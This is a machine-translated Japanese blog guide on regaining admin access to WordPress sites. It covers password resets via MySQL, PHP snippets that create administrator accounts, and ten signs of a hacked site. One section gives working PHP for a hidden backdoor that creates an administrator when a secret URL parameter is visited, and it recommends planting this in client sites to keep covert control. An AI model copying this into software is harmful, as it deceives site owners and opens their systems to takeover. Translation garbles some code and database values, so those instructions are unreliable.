WordPress Webサイトにハッキングする方法、完全ガイド

WordPress Webサイトにハッキングする方法、完全なガイド


違法または悪意のある行為を容認、承認、奨励することはありません。この記事の目的は、あなたが所有しているWordPressサイトにハッキングしたり、アクセスを回復したりする方法、またはあなたに編集、管理、アクセスの権限があることを説明することです。何をするにしても、自分でやります. 私たちはあなたの行動に対して責任を負いません。このガイドは教育目的でのみ提供されます.

説明されている方法は、アカウントがなくなってもサイトへのアクセスを回復するのに役立ちますが、サイトに関するいくつかの情報を必要とし、ランダムなWordPressインストールへのハッキングには役立ちません.

このガイドでは、これから説明します。

  • WordPress Webサイトにハッキングする方法
  • WordPressでバックドアを作成する方法
  • FTP経由で新しいユーザーアカウントを作成する方法
  • WordPressサイトがハッキングされている10の兆候

WordPress Webサイトにハッキングする方法、完全なガイド

あなたが自分で助けることができる状況

次の状況のいずれかに該当する場合は、我々の方法がアクセスを回復するのに役立ちます。

  • ユーザー名またはメールアドレスを忘れた
  • ホスティングサーバーでパスワードのリセットオプションが機能しない
  • パスワードのリセットメールが届かない
  • アカウントのメールアドレスにアクセスできなくなった
  • ユーザー名とパスワードを知っているが、組み合わせが機能しない

以下で説明する方法を使用するには、次のものが必要です。 次の1つのみ

  • サーバーへのFTPアクセス、または
  • サーバーへのcPanelアクセス、または
  • MySQLデータベースへのアクセスとリモートでそれに接続する機能

方法#1 – MySQLの方法

このメソッドを使用して、既存のユーザーのパスワード(または必要に応じてユーザー名)を変更するか、新しいアカウントを作成します。 cPanelアクセスまたはサイトのデータベースへの直接MySQLアクセスが必要です. まず、既存のユーザーのパスワードを変更してみましょう.

cPanelを使用している場合、ログイン(cPanelには常に https://yoursite.com:2083 リンク)、phpMyAdminを見つけて開きます. データベースとテーブルのリストは左側にあります. で終わるテーブルを探しています _users. たぶん wp_users, サーバーに複数のWordPressサイトがインストールされている場合は、適切なサイトを見つける必要があります.

右側のテーブルには、編集するユーザーが含まれています。次のような外部クライアントを介してMySQLに接続している場合も同じ手順に従います。 SQLyog. テーブルと実際のユーザーレコードが見つかったら、パスワードを変更します。.

あなたがたぶん今までに理解したように、パスワードは user_pass MD5アルゴリズムを使用してハッシュされたフィールド。を開く オンラインMD5ジェネレーター 使用したいパスワードを入力し、「ハッシュ」をクリックします. 生成された文字列をコピーし、元のパスワードを置き換えます それと。 phpMyAdminでは、フィールドをダブルクリックして編集できます。手順は他のMySQLクライアントでも同様です。変更を保存し、新しいパスワードでWordPressにログインします.

WPユーザーテーブル

ユーザー名、ハッシュ化されたパスワード、メールは、 wp_users データベーステーブル

まだ方法#1 –新しいユーザーの作成

新しいユーザーの作成は少し複雑ですが、それでも1分未満で管理できます. 新しいレコードを作成する usersテーブルに入力して、user_login、user_pass(ハッシュ、上記のMD5関数を使用)、およびuser_emailを入力します。他のすべてのフィールドは空のままにできます。彼らは関係ありません新しいレコードを保存します。保存すると、MySQLによって一意のIDが付与されます。 IDフィールドの番号です。それを覚えて.

次に行きます _usermeta テーブル。覚えて, テーブルのプレフィックスはユーザーのプレフィックスと同じである必要があります. 例えば wp_users そして wp_usersmeta. プレフィックスが同じでない場合、(他のWPインストールの)間違ったテーブルを編集しているため、新しいアカウントは機能しません。 2つの新しいレコードを作成します。無視する umeta_id それらの両方のフィールド。セットする ユーザーID フィールドに、覚えたばかりの値(usersテーブルの新しいID値)を入力します。最初のレコードセット meta_key に wpct_user_level そして meta_value に 10. 2つ目は meta_key に wpct_capabilities そして meta_value に a:1:{s:13: "管理者"; b:1;}. 両方を保存します。完了–ログイン!

メソッド#2 – functions.phpの方法

このアプローチは、cPanelでfunctions.phpを編集するか、FTPクライアントを使用して行うことができます。 cPanelを使用している場合は、ファイルマネージャを見つけて開きます. まず、アクティブなテーマのフォルダーを見つける必要があります.

に行く public_html / wp_content / themes フォルダ。あなたがすぐにあなたのテーマを見て、それがどれであるかを知っているなら–素晴らしい。そのフォルダを開いて編集を開始します functions.php. そうでない場合は、サイトを開いて任意の場所を右クリックし、[ソースを表示]を選択します。次にCtrl + Fを押して入力を開始します / themes / すぐに多くのURLが強調表示され、アクティブなテーマのフォルダ名がわかります.

それをファイル構造で見つけて開き、編集を開始します functions.php. ファイルの最後に次のコードをコピーして貼り付けます. 終わりに気をつけて ?> PHPタグがある場合. 彼らは最後の行でなければなりません。その前にコードを挿入します.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

if(!username_exists($ new_user_email)){
$ user_id = wp_create_user($ new_user_email、$ new_user_password、$ new_user_email);

wp_update_user(array( 'ID' => $ user_id、 'nickname' => $ new_user_email));

$ user = new WP_User($ user_id);
$ user-> set_role( 'administrator');
}

コードの最初の2行のみを編集して、新しいアカウントを反映します。. そのメールを持つWPにユーザーが既に存在する場合、新しいアカウントは作成されないので、新しいことを確認してください. パスワードも変更します。スクリプトキディにハッキングされないようにしてください。ファイルを保存した後、サイトを開くだけでコードが実行され、管理者権限を持つ新しいアカウントが作成され、それを使用してログインできるようになります.

その後、コードを必ず削除してください functions.php.

その他のハッキング方法

FTP、cPanel、またはMySQLのパスワードを知っていることで、サーバーへの正当なアクセス権があり、WordPressインストールへのアクセス権も必要であることを証明しています。これらのアカウントをお持ちでない場合は、(他の人のサイトへのハッキング)役に立たないことになり、それは良くありません。!

コンピュータ、サイト、サーバーへの不正アクセスは重大な犯罪であり、ほとんどの国で迅速に対処されていることを覚えておいてください.

WordPressサイトがハッキングされる恐れがある場合は、無料のWordPressセキュリティスキャナーでこのページを確認してください。ブログを設定する時間がない場合は、私たちにお任せください.

WordPressでバックドアを作成する方法

フロントドアが閉じているときに、バックドアを試すことができます。これは、サイトにアクセスするためのコードを使用してサイトにアクセスする悪意のある方法のように聞こえるかもしれませんが、誰かがそれを盗んだ場合に実際に自分のサイトを制御する必要がある場合があります.

他の人のためにあなたがしていることのためにウェブサイトを作成しているのなら、遅かれ早かれ、あなたがあなたの仕事の代金を支払うことを拒否するクライアントがいるでしょう。あなたのログイン情報を削除し、あなたが行ったすべての制御を引き継ぐクライアント。 FTP経由で新しいユーザーを作成するか、パスワードをリセットするだけで十分な場合もあります。それが十分でないとき, 戻る方法をハックしたり、管理ページへのバックドアアクセスを作成したりすることができます.

ただし、WordPress環境で小さなコードを非表示にすることにした場合は、ある程度の尊厳を失わず、 管理者権限でWordPressサイトにアクセスする. そして、そこからゲームが始まります.

この泥棒が何回あなたの情報を削除したり、おそらく彼が所有しているサーバーでバックアップを復元したとしても、バックドアの入り口について何も知らない可能性があります。彼がそうした場合、彼はおそらくWordPressの設定にあなたの助けを必要としないでしょう?

バックドアを作成します。

話はこれで十分です。仕事を完了するために必要なコードの一部を次に示します。

  1. functions.phpファイルを開きます
  2. 次のコードをコピー/貼り付け:
  3. add_action( 'wp_head'、 'wploop_backdoor');
    function wploop_backdoor(){
    もし($ _GET ['backdoor'] == 'knockknock'){
    require( 'wp-includes / registration.php');
    もし(!username_exists( 'username')){
    $ user_id = wp_create_user( 'name'、 'pass');
    $ user = new WP_User($ user_id);
    $ user-> set_role( 'administrator');
    }
    }
    }
    ?>
  4. 変更内容を保存

コードをそのままにしておくと、サイトに新しい管理者を作成するために行う必要があるのは、アクセスするだけです。 http://www.yourdomain.com/?backdoor=knockknock

ページが読み込まれた後、新しいユーザー名は “名前” とパスワード “パス”.

もちろん, あなたはコードでそれを変更することができます 上記の「名前」と「パス」を変更する あなたが望むものに。 「バックドア」や「ノックノック」を思いついたものに変更することで、バックドアへのリンクを変更することもできます.

この機能を試してみてください。楽しいだけでなく、将来は完全に信頼できない人のためにWebサイトを作成しようとしているときに、本当に役立ちます。ワードプレスとブログのスキルもレベルアップする必要があります.

FTP経由で新しいユーザーアカウントを作成する方法

WordPressで新しいユーザーアカウントを作成するのはとても簡単です。管理者として、あなたはする必要があります ユーザー管理ページに移動 ここで、任意のユーザーロールの新しいアカウントを作成できます。これは数秒で実行でき、新しく作成されたユーザーは指定されたユーザー名とパスワードですぐにログインできます.

しかし、WordPress管理者にアクセスできなくなった場合はどうなりますか?少し複雑になるかもしれませんが、心配しないでください。管理者の命を救うことができる機能が用意されています。.

別の管理者がアカウントを削除したか、誤ってデータベースからすべてのユーザーを削除したか、誤動作しているプラ​​グインを使用したか、ハッキングされたかにかかわらず、引き続き制御を取り戻すことができます。時々、あなたはFTPサーバーにしかアクセスできないかもしれませんが、HTTPはあなたの手の届かないところにあり、あなたは新しい管理者を作成する必要があるでしょう。それはまれなケースかもしれませんが、次の関数はあなたを救います.

WordPress管理環境外で新しいアカウントを作成するには, 必要なのは、サイトへのFTPアクセスだけです。管理者は、サーバーにログインするために必要なすべての情報を持っている必要があり、テーマに新しい関数を作成することで、新しいアカウントをすばやく作成できます.

FTP経由で新しいユーザーアカウントを作成します。

  1. FTPクライアントを開き、アカウントに接続します
  2. wp-content / themesに移動します
  3. 使用しているテーマのフォルダーを開く
  4. functions.phpファイルを検索して編集します
  5. 次の関数をコピーして貼り付けます。
  6. function admin_account(){
    $ user = 'ユーザー名';
    $ pass = 'パスワード';
    $ email = '[email protected]';
    if(!username_exists($ user)&&!email_exists($ email)){
    $ user_id = wp_create_user($ user、$ pass、$ email);
    $ user = new WP_User($ user_id);
    $ user-> set_role( 'administrator');
    }}
    add_action( 'init'、 'admin_account');
    
  7. ユーザー名、パスワード、メールアドレスをユニークなものに変更します
  8. 変更内容を保存

関数で設定したユーザー名、パスワード、メールアドレスが一意であることを確認してください さもなければ機能はきちんとはたらきません。変更を保存したら完了です。WPログインパネルに移動できます。新しい情報を使用して再度ログインし、アカウントを確認したら、functions.phpファイルから関数を削除できます.

上記の関数は管理者アカウントを作成しますが、簡単に変更して、他のユーザーロールを持つアカウントを作成できます。単に 8の役割を変える番目 行 編集者、作成者、寄稿者、購読者、または作成したその他のユーザー役割に対するコードの.

残念ながら、管理者アカウントを紛失すると、そのユーザー名で書かれたすべての投稿も紛失してしまいます。そのため、簡単に取得できるバックアップを常に保持しておく必要があります。管理者アカウントを持っているときにこれを読んでいる場合, すぐにバックアップを作成するように注意してください 将来WordPress以外でアカウントを作成する必要がある場合に備えて、この記事をブックマークしてください。.

WordPressサイトがハッキングされている10の兆候

WordPressは巨大なブログプラットフォームです。数百万のユーザーがいて、その数は毎日急速に増えているようです。人々は、他のコンテンツ管理システムで作成されたWebサイトを、このオープンソースシステムに思ったよりも頻繁に転送する傾向さえあります。そして、これは良いことですが、これは ハッカーはまた、ランダムなサイトに侵入しようとしたときに、WordPressをナンバーワンの場所に置きます.

通常、ハッキングされた場合は、すぐにそのことがわかります。サイトにアクセスできなくなります。ログインできなくなり、ハッカーがトップページにメッセージを残すこともあります。しかし、たいていの場合, 何かが変わったことに気付かないかもしれません. 記事のこの部分では、WordPressサイトがハッキングされたことを示すいくつかの兆候と、問題のいくつかの解決策を示します.

1.失敗したログイン

この兆候はかなり明白です。しばらくの間ユーザー名とパスワードの組み合わせを問題なく使用していた場合、突然WordPressがアカウントを認識しないと疑わしいことがあります。. ハッカーがあなたのサイトにログインしなければならない場合、彼はあなたの管理者権限をすぐに変更する可能性があります.

多分彼はあなたのパスワードを変更したり、あなたのアカウントを完全に削除したりしました。 WordPressが最初に間違ったユーザー名/パスワードについてメッセージを送った後パニックに入る前に、間違った組み合わせを入力したか、Caps Lockボタンをオンにした可能性があることを考慮してください.

解決:電子メールでパスワードを回復するか、別のアカウントを使用して再度ログインしてください。ログインを安全に保つために、インストールすることをお勧めします ログイン忍者 WordPress用プラグイン.

2.悪意のあるコンテンツがサイトに追加されている

サイトにマルウェアの警告が含まれています

サイトの見慣れないコンテンツに気づき始めたら、心配になり始めるかもしれません。彼らがあなたの管理領域にアクセスする機会を得たとき, ハッカーはコアとテーマとプラグインファイルの両方を変更できます. つまり、彼らは彼らが望むものを何でも変えることができるということです.

一部のハッカーはあなたのサイトの見た目を大幅に変更し、おそらくあなたがハッキングされたことを綴ることさえしますが、他のものはそれについてはるかに微妙です.

解決:ウェブサイトのコードで隠しコンテンツを探してみてください。ハッカーがサイトのフッターに仕掛けた悪質なサイトへのリンクがあるか、ハッカーが定期的に顧客に開かれるポップアップをインストールしている可能性があります。 Security Ninjaを使用してサイトをスキャンするか、そのような問題がないかサイトを継続的に監視します.

3.不審な訪問

ウェブサイトを追跡していない場合は、すぐに追跡を開始する必要があります。簡単な方法は、Google Analyticsを使用することです。この機能は、他の多くの機能の中でも、取得した訪問の数と、それらの訪問がどこから来ているかを示すことができます。しばらくすると、あなたのウェブサイトを知るようになります。つまり、訪問がどこから来ているのか、新しいキャンペーンをいつ開始するのか、そして実際にリリースされた新しいプロモーションリンクがあるのか​​がわかります。.

しかし、あなたのサイトが不審なドメインからの膨大な数の新しい訪問に突然気付いた場合, サイトがハッキングされる可能性があるため、さらに調査する必要があります。通常、この種のアクセスでは、直帰率が100%になるため、アクセスされたページは1つだけになります。ハッカーは他の悪いサイトをあなたに導く自動化システムを頻繁に使用します。サイトで実行されるのが悪質なコードであるか、スパムネットワークの一部になったかに関係なく、事態は深刻になる可能性があり、悪意のあるコードがないかサイトをチェックする必要があります.

解決: 使用する Googleウェブマスターツール 不審なドメインを見つける

4.突然のトラフィックの減少

安全なブラウジングSsiteステータス

先に述べたハッキン​​グの兆候とは異なり、訪問数が突然減少するため、これは警告を発する可能性があります。新しい訪問を紹介する代わりに, ハッカーがあなたのサイトから別の訪問を送信する可能性があります. これは、ハッカーがサイトを別のサイトにリダイレクトしたために発生する可能性があります。訪問者が少ないもう1つの理由は、Googleがサイトをブラックリストに登録したことです。このアクションは、感染しているためにサイトを開かないことを選択するすべてのユーザーにメッセージを表示します.

解決:Googleの セーフブラウジングサイトのステータス サイトが安全でないとマークされており、現在アクセスするのが危険かどうかを確認する.

5.検索エンジンの結果がおかしい

サイトの変更に気づかなかったが、Googleや他の検索エンジンでの検索結果がおかしい(異なるタイトルや他のメタデータを表示する)ことがわかった場合、これはハッキングされたサイトの明らかな兆候である可能性があります。ハッカーは、専門家だけが見ることができるようにコンテンツを変更した可能性があります。それでも、変更は検索エンジンの結果に表示されます.

解決:サイトを確認する Googleウェブマスターツール, あなたのサイトがこれでハッキングされていないか確認してください 無料のオンラインツール.

6.メールを送受信できない

ハッカーがサイトにアクセスすると、おそらくハッカーは サーバーを使用して他のすべてのユーザーにスパムを送信する. WordPressから新しいメールを送受信できないことがわかった場合、これはハッキングされた明確な兆候である可能性があります。メールをもう一度確認し、プロバイダーに確認してエラーがないことを確認します.

解決:WordPressをテストする メール機能 この無料のプラグインで.

7.サイトが存在しない

サーバーが見つからない

ハッカーがサイトにアクセスして悪意のあるコードを仕掛けたり、ユーザーをリダイレクトしたり、メールをスパムに使用したりしない場合があります。時々, 彼らがしたいのはあなたのサイトをクラッシュさせることだけです. めったに、ハッカーがサーバー全体からすべてを正常に削除することはありません。そのため、有名なホスティング会社でファイルをホストし、セキュリティを確保し、ウェブサイトのバックアップを毎日または少なくとも毎週保持することが重要です。サイトをすばやく復元できるように、時々独自のバックアップも行うことをお勧めします。.

解決:WordPressのバックアップ管理に最適なプラグインの1つをインストールします.

8.不審なファイル

既存のファイルに追加される可能性のある悪意のあるコンテンツに似ています, ハッカーは、ルートフォルダー内の任意の場所に追加のファイルを作成する可能性があります. WordPressの使い方を知ることは良いことですが、経験が浅い場合は、すべてのファイルとアクティビティをチェックできるセキュリティツールを自由に利用できるはずです。最近、すべてのWordPressファイルをチェックするのに最適なツールであるセキュリティ忍者をレビューしました.

解決:WordPressインストールに属していないファイルを探してみてください。 Security Ninjaを使用して定期的にサイトをスキャンし、それらのファイルを自動的に見つけます。次に、ファイルを削除するか、感染ファイルから悪意のあるコードを削除します。 Security Ninja用のCore Scannerアドオンを忘れないでください.

9.新しいメンバー

サイトによっては、新しいメンバーを追加できるのはあなただけかもしれません。その場合、新しく登録されたユーザーについて通知するメールがアラームをトリガーする可能性があります。新しいメンバーを追加できる管理者が他にもいる場合は、不審なアクティビティについて管理者に確認してください.

解決:無料のプラグインでログインURLを変更し、.htpasswdファイルを使用してWordPressログインページへのアクセスを制限し、ログインニンジャを使用してログインフォームを常に保護します.

10.サーバーでスケジュールされたイベントを確認する

場合によっては、ハッカーは侵入先のウェブサイトに影響を与えません。代わりに, 彼らは予定されたイベントを残します 将来的にはサイトに害を及ぼす可能性があります。ハッカーは最初は経験の浅い犠牲者を無知のままにすることができるため、この手法は危険です。あなたは感染していてそれについて何も知らないかもしれません.

解決:使用しているサーバー上のCRONジョブを確認し、疑わしいスケジュールされたタスクがないことを確認します.

まとめ

この記事が、より安全なWordPressサイトの管理に役立つこと、また、悪い状況で再びアクセスできるようになることを願っています。そして あなたのサイトがきれいであっても、それを当たり前のことと考えないでください.
ブログが安全であることを常に確認してください。ほとんどの場合あなたを救うことができるWordPressのセキュリティプラグインをお勧めします。それでも、安全でないパスワードを使用するユーザーではなく、自分のWordPressサイトにハッキングするときは注意してください.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map